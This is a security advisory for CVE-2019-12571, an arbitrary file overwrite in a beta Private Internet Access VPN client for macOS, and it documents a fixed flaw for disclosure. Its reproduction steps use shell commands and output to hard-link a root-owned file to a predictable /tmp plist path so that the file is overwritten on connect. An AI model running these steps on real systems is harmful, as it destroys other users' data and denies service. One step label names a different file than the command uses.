Allele Security Alert
ASA-2019-00378
Identifier(s)
ASA-2019-00378, CVE-2019-12571
Title
Arbitrary File Overwrite
Vendor(s)
London Trust Media
Product(s)
Private Internet Access (PIA) VPN Client for macOS
Affected version(s)
Private Internet Access (PIA) VPN Client for macOS version v0.9.8 beta (build 02099)
Fixed version(s)
Private Internet Access (PIA) VPN Client for macOS version v1.2.1
Proof of concept
Unknown
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v0.9.8 beta (build 02099) for macOS could allow an authenticated, local attacker to overwrite arbitrary files.
Technical details
When the client initiates a connection, the XML /tmp/pia-watcher.plist file is created. If the file exists, it will be truncated and the contents completely overwritten. This file is removed on disconnect. An unprivileged user can create a hard or soft link to arbitrary files owned by any user on the system, including root. This creates a denial of service condition and possible data loss if leveraged by a malicious local user.
Steps to reproduce
All steps are executed as a low privileged user.
macbook:~ test2$ id uid=508(test2) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),704(com.apple.sharepoint.group.4),100(_lpoperator),701(com.apple.sharepoint.group.1),333(piavpn),703(com.apple.sharepoint.group.3),702(com.apple.sharepoint.group.2)
Step 1 – Create a root owned test file with permissions 600.
bash-3.2# echo "this is a test" > /etc/test.file bash-3.2# chmod 600 /etc/test.file bash-3.2# ls -ld /etc/test.file -rw------- 1 root wheel 15 Dec 27 10:14 /etc/test.file
Step 2 – Show that test2 does not have permission to write to /etc/test.file.
macbook:~ test2$ echo test > /etc/test.file -bash: /etc/test.file: Permission denied
Step 3 – Create a hard or soft link to a root owned file.
macbook:~ test2$ ln /etc/test.file /tmp/pia-watcher.plist macbook:~ test2$ ls -li /etc/test.file /tmp/pia-watcher.plist 12888119231 -rw------- 2 root wheel 15 Dec 27 10:14 /etc/test.file 12888119231 -rw------- 2 root wheel 15 Dec 27 10:14 /tmp/pia-watcher.plist
Step 4 – Open the PIA client and connect. The file will be overwritten with the XML plist.
macbook:~ test2$ ls -li /etc/test.file /tmp/pia-watcher.plist ls: /tmp/pia-watcher.plist: No such file or directory 12888119231 -rw------- 1 root wheel 801 Dec 27 10:17 /etc/test.file
Step 5 – As root display the contents of /etc/secret.file
bash-3.2# cat /etc/test.file
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.privateinternetaccess.vpn.watcher</string>
<key>ProgramArguments</key>
<array>
<string>/Applications/Private Internet Access.app/Contents/MacOS/pia-openvpn-helper</string>
</array>
<key>EnvironmentVariables</key>
<dict>
<key>script_type</key>
<string>watch-notify</string>
</dict>
<key>StandardErrorPath</key>
<string>/Library/Application Support/com.privateinternetaccess.vpn/watcher.log</string>
<key>WatchPaths</key>
<array>
<string>/Library/Preferences/SystemConfiguration</string>
</array>
</dict>
</plist>
Credits
Rich Mirch
Reference(s)
PIA Beta macOS Arbitrary File Overwrite
https://github.com/mirchr/security-research/blob/master/vulnerabilities/PIA/CVE-2019-12571.txt
CVE-2019-12571
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12571
CVE-2019-12571
https://nvd.nist.gov/vuln/detail/CVE-2019-12571
If there is any error in this alert or you wish a comprehensive analysis, let us know.
Last modified: August 5, 2019